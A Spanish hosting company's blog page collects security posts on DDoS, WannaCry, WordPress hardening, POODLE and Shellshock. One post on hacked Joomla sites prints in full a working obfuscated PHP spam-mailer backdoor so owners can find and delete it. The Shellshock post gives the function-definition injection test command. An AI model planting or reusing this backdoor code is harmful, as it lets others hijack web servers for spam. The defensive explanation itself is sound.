944 063 154

Blog

Categoría: Ciberataques

¿Qué tienen en común un ataque DDOS y un ataque DOS?

Publicado enCiberataques en abril 26, 2018 3:39 pm

El paso de los años y la popularización de todo tipo de dispositivos tecnológicos ha generado una relación directamente proporcional entre el número de aparatos de los que dispone cada ciudadano y la cantidad de ataques informáticos que se producen. De esta forma, cuantos más dispositivos electrónicos tengamos, más fácil será sufrir un ciberataque como los ataques DoS y DDoS. Normalmente, como consecuencia de una configuración errónea o debido a fallos de seguridad. Porque, aunque la tecnología esté pensada para facilitarnos la vida, hay quien tiene unas intenciones totalmente opuestas acerca de su uso.

DoS y DDoS

Entre los ataques más utilizados para desestabilizar sistemas informáticos, están los llamados ataques DDoS y ataques DoS. Los primeros se traducen al español por ataque de denegación distribuida del servicio; los segundos, por denegación del servicio. En ambos casos, el ataque consiste en sobrecargar un servidor desde diferentes IPs con una cantidad de peticiones superior a las que puede gestionar. De esta forma, se produce una alteración del servicio, ya sea ralentizando la página o, directamente, haciendo que se caiga. La diferencia se encuentra en que en un ataque DoS el que realiza todas las peticiones es un único ordenador. En cambio, en un ataque DDoS, son muchas las máquinas que atacan simultáneamente al mismo servidor.

Es por ello que un ataque DoS es mucho más fácil de detener que un ataque DDoS. Y es que, en un ataque DDoS, las IPs provienen de diferentes partes del mundo y desde las que es muy probable que el propietario del dispositivo no sea consciente de que su ordenador está infectado. Y que, como consecuencia de ello, está contribuyendo a provocar uno de estos ataques.

Esto que parece algo lejano y tarea de hackers también puede producirse de forma inconsciente. Es tan simple como tener una web alojada en un plan de hosting de recursos muy limitados y que un día reciba un alto número de visitas. En esta situación, el servidor no puede gestionar todas esas peticiones repercutiendo en el funcionamiento de la web. Esto mismo podría darse no solo con un servidor, si no con una infraestructura completa.

Las consecuencias de los ciberataques

Aunque tanto los ataques DoS, como los ataques DDoS actúan en el servidor, no suele ser habitual que lleguen a producir daños físicos en él (más allá de la caída o lentitud en las respuestas). En cambio, dependiendo de la naturaleza de la web, sí pueden ocasionar pérdidas económicas a los propietarios de las páginas. Especialmente si se trata de una tienda online que durante la caída del servicio estaría perdiendo ventas.

Detener un ataque DDoS es labor del administrador de sistemas. Generalmente encargado de la gestión del alojamiento web. Y, que la duración del mismo sea más o menos prolongada dependerá de la pericia del SysAdmin haciendo frente a este tipo de problemas. Sobre todo evitando que acabe propagándose a más dispositivos.

Backups y actualizaciones: tus aliados ante un ciberataque

Publicado enCiberataques Correo / Webmail en mayo 24, 2017 10:11 am

El pasado viernes 12 de mayo varias de las grandes compañías fueron víctimas de un ciberataque. Pero no solo empresas españolas, sino también algunas extranjeras como el Servicio de Salud británico o la Red ferroviaria alemana. El culpable del caos que se generó fue el software malicioso del tipo ransomware WannaCry. El ciberataque bloqueó miles de ordenadores a escala mundial. Secuestrando todos los archivos que contenían y pidiendo un rescate a cambio. En muchas ocasiones, incluso pagando el rescate, esos archivos nunca llegan a recuperarse. A WannaCry se une en los últimos días EternalRock, un malware más potente y silencioso. Por lo mencionado y mucho más, resulta evidente la importancia vital de los backups o copias de seguridad.

La palabra ransomware es cada vez más frecuente, incluso entre aquellos que están desconectados del mundo informático. Ante la imposibilidad de frenar estos ataques, solo queda la opción de tomar medidas preventivas de forma que, en caso de un nuevo ciberataque, no salgamos perjudicados.

La importancia de las copias de seguridad

En primer lugar, es recomendable realizar con frecuencia backupscopias de seguridad de todos los archivos. Así, en caso de que nuestros equipos sean víctimas de un ataque informático, bastará con restaurar todos los elementos. De este modo, los dispositivos vuelven al estado anterior (esto es, a la fase previa al ciberataque). De cualquier forma, no deberíamos descuidar la frecuencia con la que realizamos backups. Todo ello es debido a que, además de los ciberataques, pueden darse multitud de circunstancias que provoquen la pérdida de nuestros datos.

Recuerda que, además de realizar copias en la nube, es aconsejable hacer copias de seguridad también en dispositivos que no tengan conexión a internet. Como USBs o discos duros externos. De forma que tu información no esté solo almacenada en internet.

Actualiza el sistema

Mantener los sistemas operativos siempre actualizados es esencial para evitar este tipo de ataques, ya que con cada actualización del sistema se prepara a los dispositivos para no ser vulnerables. En el caso de WannaCry, Windows se vio obligado a lanzar un parche para aquellas versiones obsoletas que ya no contaban con soporte en un intento de ayudar a sus usuarios. Para el software obsoleto la mejor medida es desconectar el protocolo que permite compartir archivos a través de internet. Si tu sistema operativo no tiene soporte, es mejor mantenerlo alejado de la red. Mejor prevenir que lamentar las consecuencias de cualquier ataque informático.

Puesto que gran parte de los ciberataques se producen a través del correo electrónico, es aconsejable, además de un antivirus y antispam, no abrir correos que puedan ser sospechosos. Ni mucho menos descargar el contenido adjunto. La mayoría del software malicioso viene oculto en un archivo aparentemente inofensivo en formato .exe, .doc o .xls. Así que, si recibes un email de procedencia dudosa, elimínalo de tu buzón de correo antes de que pueda llegar a propagarse entre tu lista de contactos.

Realiza backups o copias de seguridad con asiduidad. Además, actualizar el sistema operativo así como la prevención con el correo electrónico, son medidas a tener en cuenta. Cabe destacar que, ante cualquier ciberataque, la prevención es nuestro mejor aliado.

¿Qué debes considerar para no descuidar la seguridad de tu WordPress?

Publicado enCiberataques en abril 6, 2017 10:52 am

La seguridad de tu WordPress es, junto con las copias de seguridad, una de las cosas que no suele tenerse en cuenta hasta que ya es demasiado tarde. Sobra decir que no es necesario esperar a tener cualquier tipo de incidente para tomar medidas que sirvan para mejorar el nivel de seguridad de nuestra web.

Aunque no lo parezca, los ataques a WordPress son muy comunes debido a la multitud de hackers que pretenden explotar las vulnerabilidades de la plataforma. Es decir, que no se trata de ataques personalizados contra una página web en concreto. Sino que es algo más general que únicamente busca conocer cuáles son las principales debilidades del código de WordPress. Así que, si no quieres poner en riesgo todo tu trabajo y dificultarles las cosas a los hackers, en Linube te recomendamos tener en cuenta algunos aspectos.

La calidad del hosting por delante

Habitualmente se suele elegir el proveedor de hosting en función de su precio. Cabe destacar que aunque este aspecto sea probablemente el más tentador de todos, no debería ser el más importante. Hay que tener en cuenta que la calidad del hosting se paga. Por tanto, el proveedor de alojamiento que ofrezca unos precios ligeramente más altos, seguramente también invierta más dinero en la seguridad de sus servidores.

Por eso, antes de elegir un hosting por ser barato, elige uno que ofrezca más y mejores garantías de seguridad. Además de un servicio de calidad. A pesar de que los niveles de seguridad del servidor no dependan directamente de ti, eres tú quien tendrá que escoger la mejor opción en cuanto al proveedor del alojamiento de tu página web.

Temas y plugins siempre actualizados

Gran parte de los ataques a las webs vienen dados por la falta de actualización de la plataforma WordPress. Tanto de los temas, como de los plugins,. De ahí que haya que estar siempre atento a las últimas actualizaciones e instalarlas lo antes posible. Así evitaremos las vulnerabilidades de WordPress como consecuencia de la escasa protección por tener los plugins o los temas desactualizados.

En este sentido, si el plugin o el tema de nuestro WordPress ha sido descargado desde el directorio oficial de la plataforma, el propio WordPress se encargará de realizar automáticamente las actualizaciones necesarias. Y también de avisarnos si se trata de una actualización mayor. Aunque ambos procesos no sean igual de simples. En cambio, si la descarga no se ha realizado desde el directorio oficial, deberás consultar con frecuencia la web del desarrollador. Esto se debe a que WordPress no puede saber cuándo hay disponible una nueva actualización.

Como consejos, es recomendable no instalar plugins ni temas que no sean muy conocidos o que tengan pocas descargas; así como cualquier elemento que sea gratis o que haya sido pirateado. Cualquiera de ellos puede contener código malicioso que afecte negativamente a nuestra web.

Cuidado con instalar demasiados plugins

En Linube te aconsejamos no instalar más plugins de los necesarios. Cada plugin que instalemos aumenta la probabilidad de tener problemas de compatibilidad y de instalación. Especialmente si no han sido probados en un entorno que no sea el de producción. Asimismo, es conveniente borrar aquellos temas y plugins que ya no se utilicen. Estos plugins además de estar ocupando espacio, aumentan el riesgo de vulnerabilidades.

Los elementos Premium, tanto temas como plugins, cuentan con mejor soporte y actualizaciones más frecuentes disminuyendo las posibilidades de sufrir cualquier tipo de vulnerabilidad. Con Premium podemos realizar cualquier descarga realizada desde sitios seguros como el directorio oficial de WordPress. Los sitios seguros ofrecen las últimas versiones actualizadas, comprobadas y seguras de los temas y plugins.

Nombre de usuario y contraseña

Recuerda eliminar el usuario admin que, por defecto, nos pone WordPress. Éste, junto con el nombre de dominio de la página web son las primeras opciones que se prueban para entrar en un sitio web sin permiso. También deberás huir de todo nombre de usuario que sea fácil de identificar con tu sitio web. No descuides la seguridad de tu WordPress por detalles que pueden resultar letales.

En cuanto a contraseñas, ten en cuenta que cuanto más fácil de recordar sea para ti, también lo será para todo aquel que quiera entrar en tu página web. Hoy en día ya no es necesario que sea recordable. La mayoría de los navegadores lo harán por ti. Así que, para que tu contraseña sea segura, deberá estar compuesta al menos de 8 caracteres. Los más seguros serán los que se mezclen letras mayúsculas y minúsculas con números y caracteres especiales. A medida que vayas escribiéndola, el propio WordPress te irá indicando el nivel de seguridad de tu contraseña. Si no eres capaz de dar con una combinación lo suficientemente segura, WordPress cuenta con un generador de contraseñas que puede ser de gran ayuda.

Si quieres dificultar aún más el acceso a tu página web, puedes limitar el número de intentos para logearse. Estableciendo un máximo de intentos, además de tener margen por si eres tú quien falla a la hora de escribir los caracteres, se lo pondrás mucho más difícil a los posibles intrusos.

No te olvides de las copias de seguridad

El pasado 31 de marzo se celebraba el día mundial del backup puesto que aún es necesario concienciar de la importancia de las copias de seguridad. Evita que te quedes sin todos tus datos en caso de que ocurra alguna incidencia. Realiza copias de seguridad al menos una vez a la semana tanto de tus bases de datos como de todos tus archivos; así podrás garantizar la seguridad de tu WordPress pudiendo devolver a la página a su estado previo sea la incidencia que sea.

Cuanto más reciente sea tu backup, más fácil será devolver tu página web al estado en el que se encontraba antes de que se produjera el error. Si es posible, te recomendamos automatizar tus copias de seguridad. Así si tú te olvidas de realizarlas, el sistema lo hará por ti.

Encripta toda la información

Para que la seguridad de tu WordPress sea aún mejor, contrata un certificado SSL.  Estos certificados tienen la función de encriptar toda la información. De modo que, si hay alguien más conectado a tu red, solo podrá ver caracteres sin sentido, en vez de información valiosa. Además, la instalación de un certificado de seguridad SSL otorga a tu sitio web otras ventajas que harán de tu web un lugar seguro.

mejora-seguridad de tu WordPress-linube

Deja que expertos se encarguen de la seguridad de tu WordPress

En Linube contamos con un servicio de administración de WordPress para que no tengas que preocuparte por la seguridad de tu web, porque nosotros lo haremos por ti. El servicio incluye la monitorización permanente del sitio web, soporte 24 horas, firewall perimetral y copias de seguridad; además de la actualización de temas y plugins instalados en tu WordPress. Céntrate en otros aspectos de tu negocio y pon tu la seguridad de tu WordPress en las mejores manos.

Poodle Attack (ataque caniche) – Vulnerabilidad en SSL 3.0

Publicado enCiberataques
poodle attack-ataque caniche-ssl-linube

Recientemente, Google ha hecho pública una vulnerabilidad en el protocolo SSL 3.0. Esta vulnerabilidad permite a un atacante aprovechar el bug para forzar el uso de SSL 3.0 y obtener datos sensibles gracias a poder descifrar la información. Hablamos del ya famoso Poodle Attack.

Poodle Attack o Ataque Caniche

A pesar de que SSL 3.0 ya no se utiliza más que en navegadores antiguos (como Internet Explorer 6.0), por motivos de compatibilidad, tanto los navegadores como los servidores aún lo soportan. El ataque, bautizado como Poodle atack, se basa en provocar fallos que obliguen al visitante a negociar en SSL 3.0. Así, el atacante podría modificar el tráfico entre el navegador y el servidor leyendo información protegida. Para evitarlo,  la solución más inmediata es desactivarlo; de esta forma nadie podrá descifrar los datos encriptados.

Parallels recoge la forma en la que puedes desactivar SSL 3.0 en servidores web y correo (IIS, Apache, Nginx, Postfix, Courier IMAP, Dovecot y Plesk).

A nivel de cliente, también puedes desactivar el soporte en tu navegador y utilizar sólo versiones posteriores a SSL 3.0 para que no exista la posibilidad de forzar hasta la versión más insegura del protocolo.

Cabe destacar que aún son muchos quienes continúan utilizando aplicaciones que no soportan versiones más recientes de SSL 3.0. Eso sí, las principales empresas encargadas del hosting advierten que, a corto plazo, dejarán de soportar este protocolo.

¿Crees que tu navegador pueda ser vulnerable a este error de software y quieres comprobarlo? puedes hacerlo en Poodletest.com

Vulnerabilidad grave en BASH

Publicado enCiberataques Sistemas TI

A lo largo de la noche del 24 de septiembre se ha hecho pública una grave vulnerabilidad; ésta, ha sido descubierta recientemente en el programa informático BASH. Este programa constituye la línea de comandos que utilizan muchos de los sistemas operativos que se utilizan con normalidad, como Linux, OSx o Android. Además, todos los dispositivos que forman parte del llamado Internet de las cosas (neveras, SmartTV, sistemas de domótica…) también recurren a Bash en su código. Esta nueva vulnerabilidad permite la ejecución de código explotando un fallo relacionado con algunas de las variables.

¿Somos vulnerables a BASH?

Existe una forma muy sencilla de comprobar si somos vulnerables a Bash o no. Sólo con ejecutar un comando de aspecto similar a este que mostramos a continuación, nos dirá si nuestro equipo puede estar afectado por esta grave vulnerabilidad:

$ env x='() { :;}; echo soy vulnerable' bash -c "echo Hola"

Una vez ejecutado el comando, el programa debería mostrarnos simplemente la palabra “Hola”. De esta forma indicamos que nuestro sistema no está afectado por este problema y se encuentra a salvo. Pero, en el caso de que haya sido víctima de esta vulnerabilidad recién descubierta, veremos que junto a la palabra “Hola” también se ejecuta la frase “soy vulnerable”.

Esto se puede explotar de una forma remota de múltiples maneras; por ejemplo, pasando estas variables (a través de comandos) vía CGI (php, perl…). Estos comandos se ejecutarán al realizar cualquier tipo de llamada al programa informático Bash.

Servidores siempre actualizados

Desde Linube informamos a nuestros usuarios que todos nuestros servidores se encuentran ya actualizados; tanto los internos como los administrados Linux. Tranquilo, tus sistemas ya no podrán verse afectados por esta vulnerabilidad. Aún así, si gestionas algún servidor que creas que haya podido verse afectado por esta vulnerabilidad de Bash, te recomendamos que realices las actualizaciones necesarias a la mayor brevedad posible a fin de evitar graves consecuencias. Asimismo, recomendamos permanecer atentos y seguir muy de cerca todas las novedades que vayan publicándose sobre esta vulnerabilidad. Con toda probabilidad, derivará en nuevos problemas como ya ha ocurrido en otras ocasiones cuando se han descubierto vulnerabilidades similares.

La vulnerabilidad ha sido registrada con el código CVE-2014-6271.

Si quieres obtener más detalles acerca de esta vulnerabilidad, puedes conseguir información en https://access.redhat.com/articles/1200223

¿Han hackeado mi Joomla?

Publicado enCiberataques
Joomla hackeado

Descubre cómo limpiar el código malicioso inyectado en Joomla

¿Sospechas que alguien ha hackeado tu Joomla, y está utilizándolo para realizar envíos masivos de correo spam?

Es probable que el hack en cuestión tenga forma de archivo .php. Y se encuentre mezclado con el resto de los archivos de tu página web. Además, el nombre del archivo es completamente aleatorio, y no afecta a su funcionamiento. En este caso, lo importante es el código dentro del mismo.

Limpia el código de tu Joomla

Lo más probable es que el aspecto del código malicioso sea similar a este:

<php @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) &lt; 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys ($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" &lt;$v081bde0c&gt;"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|&lt;USER&gt;(.*)&lt;/USER&gt;|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|&lt;NAME&gt;(.*)&lt;/NAME&gt;|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|&lt;SUBJ&gt;(.*)&lt;/SUBJ&gt;|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|&lt;SBODY&gt;(.*)&lt;/SBODY&gt;|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 =preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c &lt;$v9a5cb5d8&gt;"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0"); } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: &lt;<a href="mailto:%22%0d.preg_replace('/(.%7b7%7d)(.%7b5%7d)(.%7b2%7d).*/',%20'$1-$2-$3',%20md5(time())).%22@$v0897acf4">"</a><a href="mailto:%22%0d.preg_replace('/(.%7b7%7d)(.%7b5%7d)(.%7b2%7d).*/',%20'$1-$2-$3',%20md5(time())).%22@$v0897acf4">.preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4</a>&gt;\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { die(chr(79).chr(75).md5(1234567890)."+1"); } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a= false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b &lt; $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a &gt;= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 &gt;= 0x80) || ($v4a8a08f0 &lt; 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) &amp;&amp; (!$v3303c65a)) {$vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) &amp;&amp; function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("<a href="tcp://$v3d26b0b1:25">tcp://$v3d26b0b1:25</a>", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866){ return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:&lt;$vd98a07f8&gt;\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:&lt;$v01b6e203&gt;\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 &amp;&amp; substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) !=354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = '';while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if(!in_array('getmxrr', $v619d75f8) &amp;&amp; function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b= 0; $v865c0c0b &lt; strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } >

Si encuentras un archivo desconocido fuera de lugar, que tú no has creado y que lleva este código dentro, bórralo inmediatamente.

Más allá de la seguridad de tu sitio, todas tus cuentas de correo pueden verse afectadas. Por ejemplo, entrando en listas negras de spam por ser dependientes de tu dominio. Así, te impedirán enviar y recibir correo correctamente. El proceso para salir de las listas negras puede ser largo en el peor de los casos, pudiendo dejar tus cuentas de correo inutilizadas durante varios días.